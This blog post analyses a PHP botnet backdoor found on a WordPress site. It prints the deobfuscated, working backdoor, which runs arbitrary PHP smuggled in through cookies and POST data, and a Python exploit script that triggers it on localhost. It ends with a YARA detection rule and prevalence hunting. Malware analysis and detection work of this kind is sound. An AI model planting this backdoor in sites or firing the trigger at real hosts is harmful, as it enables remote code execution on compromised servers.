Analyzing (and weaponizing) a PHP botnet agent

Introduction

Recently, I gained access to a compromised WordPress site (or more likely, an old honeypot filled with malware). This presented a perfect opportunity to investigate how PHP botnets used (and still use!) to operate.

These malware samples have been circulating around the web for a very long time, and it’s shocking how a widely known threat still takes an important role in the malware distribution ecosystem.

The sample was discovered like a dead fish that pops up in the surface: the php code was shown on top of 404-not-found pages. The reason? who knows, maybe a migration of the site, an explotation failure, an error from the operator, or perhaps the botnet was dismantled and is no longer active.

In this post, I’ll walk through the process of analyzing and dissecting this PHP botnet code, examining how attackers have historically abused and weaponized compromised WordPress sites to build their botnets. I’ll also try to recreate how this C2 agents are operated.

Finally, I’ll explore the broader implications of this threat by assessing its prevalence across the web, using YARA-based retrohunting on VirusTotal and targeted Google searches.

Deobfuscation

This is a picture of the original sample I found:

A bit obfuscated, but it’s PHP and not so complex to analyze.

Initial Beautification

Since we’re dealing with PHP code, the first step is to improve its readability. I used an online PHP beautifier from beautifytools.

I needed to add the <?php tag at the beginning of the file.

The beautified file contains 467 lines of code.

Automated Deobfuscation

I tested several tools for automatic deobfuscation. The best results came from reverse-php-malware by bediger4000.

After beautifying the output again, the file was reduced to 446 lines with various variable substitutions.

Code Pattern Analysis

The code appears to be repeated seven times with different randomly generated variable names. These modifications were likely introduced by the obfuscation tool / builder.

I divided the file into 7 smaller snippets that follow the same pattern.

$ wc php_botnet_[1-7].php
   64   222  2552 php_botnet_1.php
   66   242  2667 php_botnet_2.php
   63   220  2450 php_botnet_3.php
   63   214  2413 php_botnet_4.php
   63   267  2720 php_botnet_5.php
   62   229  2446 php_botnet_6.php
   64   222  2623 php_botnet_7.php
  445  1616 17871 total

Manual Deobfuscation

A local PHP shell can help us decode obfuscated strings:

php > $rOujMiLGI = 'clas' . chr(632 - 517) . chr(217 - 122) . 'exists';
php > echo $rOujMiLGI;
class_exists

We can use this technique to resolve all remaining obfuscated strings throughout the code.

Initial Code Analysis

The first part appears identical across all seven code variants (with different variable names):

$JwnMvjTlt = 'D_nrl';
$rOujMiLGI = 'class_exists';
$rmjDtqOlI = class_exists($JwnMvjTlt);
$rOujMiLGI = '14281';
$zPfeGqPXz = strpos('14281', 'D_nrl');
if ($rmjDtqOlI == $zPfeGqPXz) {
    // rest of the code
}

After substituting variables, we can eliminate $rOujMiLGI which is only meant to complicate analysis and is not really used:

$rOujMiLGI = 'class_exists';
$rOujMiLGI = '14281';
if (class_exists('D_nrl') == strpos('14281', 'D_nrl')) {
    // rest of the code
}

The actual condition simplifies to:

if (class_exists('D_nrl') == strpos('14281', 'D_nrl')) {
    // rest of the code
}

The strpos() function searches for “D_nrl” in “14281”, which will always return false. Therefore, the condition becomes:

if (class_exists('D_nrl') == false) {
    // rest of the code
}

The class_exists() function checks if the class “D_nrl” exists in the current PHP environment. This entire block serves as a one-time execution check, with deliberately confusing comparisons to evade static code analysis or make reverse engineering more challenging.

Core Functionality

The next section contains a function, a class definition, a variable declaration, and a function call:

function EtkaemkTDw() {
    // ...
}
$mzoDChjlh = '33115';
class D_nrl {
    // ...
}
EtkaemkTDw();

For clarity, I’ve renamed EtkaemkTDw() to init() since it initializes execution. This function simply instantiates a new class with the value 33115 + 33115 (66230):

function init() {
    $fniPN = new D_nrl(33115 + 33115);
    $fniPN = null;
}

According to the PHP manual, the constructor method is called on each newly-created object, making it perfect for initialization operations.

Class Structure Analysis

The class contains both the functions __construct() and __destruct(), as well as other methods and variables.

class D_nrl {
    private function sUZcNV($mzoDChjlh) {}
    public function kGnmOo() {}
    public function __destruct() {}
    public function BpJQpTdwfY($eTwDpFJI, $VpuPvEqNf) {}
    public function enSQQgXymq($eTwDpFJI) {}
    public function __construct($AfOrpPu = 0) {}
    public static $UFvzjxeE = 62542;
}

The kGnmOo() method is unused and can be eliminated:

public function kGnmOo() {
    $data = '53428';
    $this->_dummy = str_repeat($data, strlen($data));
}

The BpJQpTdwfY() method performs xor operations between a string (inside an array) and possibly a key. The supposed key is repeated to match the size of the string.

public function BpJQpTdwfY($eTwDpFJI, $VpuPvEqNf) {
    return $eTwDpFJI[0] ^ str_repeat($VpuPvEqNf, intval(strlen($eTwDpFJI[0]) / strlen($VpuPvEqNf)) + 1);
}

Renaming for clarity:

public function xor($data, $key) {
    return $data[0] ^ str_repeat($key, intval(strlen($data[0]) / strlen($key)) + 1);
}

The enSQQgXymq() function is clearly a base64 decoder that returns an array (by using array_map). I’ve renamed it to b64_decode():

public function enSQQgXymq($data) {
    return array_map('base64_decode', [$data]);
}

Constructor Analysis

The __construct() function takes an unused parameter that can be removed:

public function __construct($AfOrpPu = 0) {
    $data = '';
    $npkQFOsND = $_POST;
    $FOmTmKK = $_COOKIE;
    $key = '5db5f694-e20d-4e23-b0b6-4e7f09687865';
    $HlEIDr = @$FOmTmKK[substr($key, 0, 4) ];
    if (!empty($HlEIDr)) {
        $HlEIDr = explode(',', $HlEIDr);
        foreach ($HlEIDr as $AQBahfuzGX) {
            $data .= @$FOmTmKK[$AQBahfuzGX];
            $data .= @$npkQFOsND[$AQBahfuzGX];
        }
        $data = $this->b64_decode($data);
    }
    D_nrl::$UFvzjxeE = $this->xor($data, $key);
    if (strpos('5db5f694-e20d-4e23-b0b6-4e7f09687865', ',') !== false) {
        $key = ltrim($key);
        $key = str_pad($key, 10);
    }
}

The final conditional (strpos('5db5f694-e20d-4e23-b0b6-4e7f09687865', ',') !== false) is a dead-end in this sample, and is probably only used on deployments with custom keys. Or maybe is just an obfuscation technique that masks the code’s true functionality.

After renaming and simplification:

public function __construct() {
    $data = '';
    $data_post = $_POST;
    $data_cookie = $_COOKIE;
    $key = '5db5f694-e20d-4e23-b0b6-4e7f09687865';
    $cookie_value = @$data_cookie['5db5'];
    if (!empty($cookie_value)) {
        $cookie_value = explode(',', $cookie_value);
        foreach ($cookie_value as $index_name) {
            $data .= @$data_cookie[$index_name];
            $data .= @$data_post[$index_name];
        }
        $data = $this->b64_decode($data);
    }
    D_nrl::$decrypted_data = $this->xor($data, $key);
}

This function checks for a cookie named “5db5”, then extracts index names by splitting its value on commas. It constructs a data string by concatenating values from both cookies and POST data with those index names. Finally, it base64-decodes and XORs the data with a UUID key, storing the result in the class’ static variable.

This example effectively illustrates how the data is collected:

data_cookies = {
    "5db5": "name1,name2,name3",
    "name1": "value_cookies_1",
    "name2": "value_cookies_2",
    "name3": "value_cookies_3",
}
data_post = {
    "name1": "value_post_1",
    "name2": "value_post_2",
    "name3": "value_post_3",
}
data = "value_cookies_1value_post_1value_cookies_2value_post_2value_cookies_3value_post_3"

Destruction

The init function creates a new instance of the “D_nrl” class, which triggers the __construct method. It then sets the instance to null, which calls the __destruct method:

function init() {
    $fniPN = new D_nrl();
    $fniPN = null;
}

The __destruct method also contains code elements meant purely for obfuscation. The variable $mzoDChjlh is defined but never used:

public function __destruct() {
    D_nrl::$decrypted_data = @unserialize(D_nrl::$decrypted_data);
    $mzoDChjlh = '50014_10810';
    $this->sUZcNV($mzoDChjlh);
    $mzoDChjlh = '50014_10810';
}

After cleaning up the unnecessary elements, the function becomes:

public function __destruct() {
    D_nrl::$decrypted_data = @unserialize(D_nrl::$decrypted_data);
    $this->sUZcNV();
}

The unserialize() function recreates a PHP value from its stored representation. For example, the array:

array(
    "key" => "value"
)

When serialized becomes:

a:1:{s:3:"key";s:5:"value";}

The unserialize() function performs the reverse operation. After unserializing the data, the code calls the private function sUZcNV(), which contains the malware’s core functionality and where the fun happens.

Core Execution

This private function first verifies that the decrypted data is an array:

private function sUZcNV() {
    if (is_array(D_nrl::$decrypted_data)) {
        $name = sys_get_temp_dir() . '/' . crc32(D_nrl::$decrypted_data['salt']);
        @D_nrl::$decrypted_data['write']($name, D_nrl::$decrypted_data['content']);
        include $name;
        @D_nrl::$decrypted_data['delete']($name);
        exit;
    }
}

The decrypted array must have the following structure:

array(
    "salt" => "value",
    "write" => "value",
    "content" => "value",
    "delete" => "value",
)

The function creates a temporary file using sys_get_temp_dir() and the crc32() hash of the salt value.

Next, it dynamically calls the function specified in the write key with the filename and content as arguments. This approach likely uses a function like file_put_contents() without explicitly naming it, helping the malware evade detection that looks for suspicious function calls.

The code then includes the newly created temporary file, executing whatever PHP code was written to it.

Finally, it attempts to delete the file (probably using the unlink() function) and exits the script to prevent further execution.

Stealth Techniques

The code uses the “at sign” (@) operator in several places to suppress error messages.

According to the Error Control Operators section in the PHP manual:

PHP supports one error control operator: the at sign (@). When prepended to an expression in PHP, any diagnostic error that might be generated by that expression will be suppressed.

This technique helps the malware operate silently without generating error messages that might alert administrators.

Summary

After deobfuscation and renaming for clarity, the full malware functionality becomes much more clear:

<?php
if (class_exists('Malware') == false) {
    function init() {
        $obj = new Malware();
        $obj = null;
    }
    class Malware {
        private function execute() {
            if (is_array(Malware::$decrypted_data)) {
                $name = sys_get_temp_dir() . '/' . crc32(Malware::$decrypted_data['salt']);
                @Malware::$decrypted_data['write']($name, Malware::$decrypted_data['content']);
                include $name;
                @Malware::$decrypted_data['delete']($name);
                exit;
            }
        }
        public function __destruct() {
            Malware::$decrypted_data = @unserialize(Malware::$decrypted_data);
            $this->execute();
        }
        public function xor($data, $key) {
            return $data[0] ^ str_repeat($key, intval(strlen($data[0]) / strlen($key)) + 1);
        }
        public function b64_decode($data) {
            return array_map('base64_decode', [$data]);
        }
        public function __construct() {
            $data = '';
            $data_post = $_POST;
            $data_cookie = $_COOKIE;
            $key = '5db5f694-e20d-4e23-b0b6-4e7f09687865';
            $cookie_value = @$data_cookie['5db5'];
            if (!empty($cookie_value)) {
                $cookie_value = explode(',', $cookie_value);
                foreach ($cookie_value as $index_name) {
                    $data .= @$data_cookie[$index_name];
                    $data .= @$data_post[$index_name];
                }
                $data = $this->b64_decode($data);
            }
            Malware::$decrypted_data = $this->xor($data, $key);
        }
        public static $decrypted_data = 62542;
    }
    init();
}

Interpolate

After understanding the core functionality, I compared all seven code snippets to identify variations. While most code elements remained identical across versions (with only the UUID keys changing), I discovered some differences in the execute function.

Some variants used a more direct approach to execute the payload:

private function execute() {
    if (is_array(Malware::$decrypted_data)) {
        $data_to_eval = str_replace("<" . '?php', "", Malware::$decrypted_data['content']);
        eval($data_to_eval);
        exit;
    }
}

In this implementation, the malware directly evaluates the content using the eval() function after stripping any PHP opening tags. I assume this was an earlier version of the malware, as it uses a more straightforward but easily detectable approach.

Warning extracted from the PHP manual:

Warning

The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

My analysis of all seven variants revealed this pattern:

1_deobfuscated.php -> version 2 (include)
2_deobfuscated.php -> version 1 (eval)
3_deobfuscated.php -> version 1 (eval)
4_deobfuscated.php -> version 1 (eval)
5_deobfuscated.php -> version 2 (include)
6_deobfuscated.php -> version 1 (eval)
7_deobfuscated.php -> version 2 (include)

This suggests the malware authors evolved their code over time, moving from the more detectable eval() approach to the more subtle temporary file method, likely to evade security scanners that specifically flag direct use of the eval() function.

Weaponizing the backdoor

For this proof of concept, I’ll host the malware on localhost using PHP’s built-in web server:

php -S localhost:8000 malware.php

I modified the UUID key in the malware code to "00000000-0000-0000-0000-000000000000" for testing purposes.

Exploit Development Strategy

The plan for building the exploit is just to reverse all the previous steps. Here’s the conceptual flow:

exploit:
payload_parts -> payload_base64 -> payload_encrypted -> payload_serialized -> payload_unserialized

builder:
payload_unserialized -> payload_serialized -> payload_encrypted -> payload_base64 -> payload_parts

The unserialized payload requires a specific format before code execution:

array(
    "salt" => "value",
    "write" => "value",
    "content" => "value",
    "delete" => "value",
)

We can use file_put_contents for the write function and unlink for the delete function. The salt can be any random data, and the content will be our malicious payload to execute. This gives us:

array(
    "salt" => "asdf",
    "write" => "file_put_contents",
    "content" => "<?php echo 'pwn' ?>",
    "delete" => "unlink",
)

Serialization

I decided to write a simple python script to join everything together.

The payload array needs to be serialized so it can be properly unserialized by the malware. While there are many serialization examples available online, here’s a minimal implementation for our specific case:

def php_serialize(obj):
    """
    Simple PHP-like serialization for basic data types
    Supports strings, integers, and dictionaries
    """
    if isinstance(obj, str):
        return f's:{len(obj)}:"{obj}";'
    elif isinstance(obj, int):
        return f'i:{obj};'
    elif isinstance(obj, dict):
        serialized = f'a:{len(obj)}:{{'
        for k, v in obj.items():
            serialized_key = php_serialize(k)
            serialized_value = php_serialize(v)
            serialized += f'{serialized_key}{serialized_value}'
        serialized += '}'
        return serialized
    else:
        raise ValueError(f"Unsupported type for serialization: {type(obj)}")

For example, our Python object:

payload = {
    "salt": "asdf",
    "write": "file_put_contents",
    "content": "<?php echo 'pwn' ?>",
    "delete": "unlink"
}

Will be serialized as:

'a:4:{s:4:"salt";s:4:"asdf";s:5:"write";s:17:"file_put_contents";s:7:"content";s:19:"<?php echo \'pwn\' ?>";s:6:"delete";s:6:"unlink";}'

Encryption

The next step is to XOR encrypt the serialized payload with the key hardcoded in the malware. This key is a unique UUID that would be practically impossible to brute-force in a real-world scenario (we don’t know the source of randomness used by the generator).

My Python implementation closely mirrors the original PHP code:

def xor_encrypt(data, key):
    extended_key = (key * (len(data) // len(key) + 1))[:len(data)]
    xored = bytes([a ^ b for a, b in zip(data.encode(), extended_key.encode())])
    return xored

Base64 Encoding

Next, we encode the encrypted payload with Base64:

>>> base64.b64encode(xored).decode()
'UQoECktDCgQXEkNRXFkSC0MKGQoSUUNJVhILQwoFChJHQllEVRILQwoBBwoPVllcVXJARURvTl9eRFVDREMSC0MKBwoSU19eRFVeRBILQwocCQoSDBJAWEAQSFNYXxAKQEdeFxAPDhILQwoGChJUVVxVRFUPC0MKBhcSRV5cRF5bEgtQ'

This encoded payload will then be distributed across multiple HTTP parameters (cookies and post data) as specified in the malware’s data collection mechanism.

Exploit!

To exploit the implanted code, we need to craft a specially formatted HTTP request.

There must be a cookie with the first 4 digits of the key as the name, in our test case "0000".

The value of this key is a comma-separated list of cookie names or object keys of the post data. The values of these index names are appended together. We can be creative in distributing the payload across different cookies or post data, but the easiest way is to just set everything in a single cookie.

And the final request will look something like this:

cookies = {
    "0000": "boring_cookie",
    "boring_cookie": "UQoECktDCgQXEkNRXFkSC0MKGQoSUUNJVhILQwoFChJHQllEVRILQwoBBwoPVllcVXJARURvTl9eRFVDREMSC0MKBwoSU19eRFVeRBILQwocCQoSDBJAWEAQSFNYXxAKQEdeFxAPDhILQwoGChJUVVxVRFUPC0MKBhcSRV5cRF5bEgtQ"
}
r = requests.post("http://127.0.0.1:8000", cookies=cookies)

PoC||GTFO:

$ python3 exploit.py
pwn

Nice! An over-complicated way to print “pwn” :D

Botnet: The Big Picture

Assessing the Malware’s Prevalence

The fact that there are seven different failed infections on a single page suggested a much wider campaign targeting multiple websites. Let’s hunt.

To investigate further, I created a YARA rule to identify similar infections:

rule yara_template {
  meta:
    target_entity = "file"
  strings:
    $s1 = "class_exists"
    $s2 = "empty"
    $s3 = "intval(strlen($"
    $s4 = "@unserialize"
    $s5 = "__construct"
    $s6 = "__destruct"
    $s7 = "is_array"
    $s8 = "exit"

    /* version 1 */
    //$o1 = "eval"
    /* version 2 */
    //$o2_1 = "sys_get_temp_dir() . \"/\" . crc32"
    //$o2_2 = "include"

    /* uuid regex */
    $re = /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/

  condition:
    all of ($s*) and
    $re
}

This rule targets the backdoor’s distinctive characteristics: the use of class constructors and destructors for execution, the serialization mechanisms, and the UUID-based authentication system.

Retrohunt Results

I decided to run a VirusTotal retrohunt query using the yara rule:

Every hit looks exactly the same; similar random variable names, the key strings from the yara rule, a uuid key, and the same pattern of code appended to the top of html pages.

The retrohunt job is limited to the last 90 days of data, with the oldest “First seen” of mid-2024, but the botnet may be older.

Based on the number of results, we can assume that there may be thousands of compromised websites.

Google Search

To supplement the retrohunt findings, I performed targeted Google searches using distinct code fragments from the backdoor:

Simple Google searches for similar samples revealed numerous hits

Example query: "intval(strlen($"

There are a lot of false positives, because this php snippet is quite generic, but the compromised sites are very easy to spot.

What’s particularly concerning is that these search results primarily reveal broken or detected instances of the backdoor. The actual number of successfully compromised sites likely far exceeds these visible cases, as properly functioning backdoors remain hidden from casual inspection.

Conclusion

This analysis reveals a PHP backdoor campaign that has likely compromised thousands of websites since at least 2024. The malware employs effective obfuscation techniques and a multi-stage execution process that makes detection challenging.

The infected websites likely serve multiple purposes in cybercriminal operations: forming a distributed botnet infrastructure, facilitating shady SEO tactics, redirecting phishing campaigns using legitimate domains, and distributing malware to unsuspecting visitors. I like to think of these types of botnets as malware CDNs.

The persistence of this backdoor demonstrates that even relatively simple PHP malware can remain effective when deployed at scale, and remains an important actor in malware distribution processes.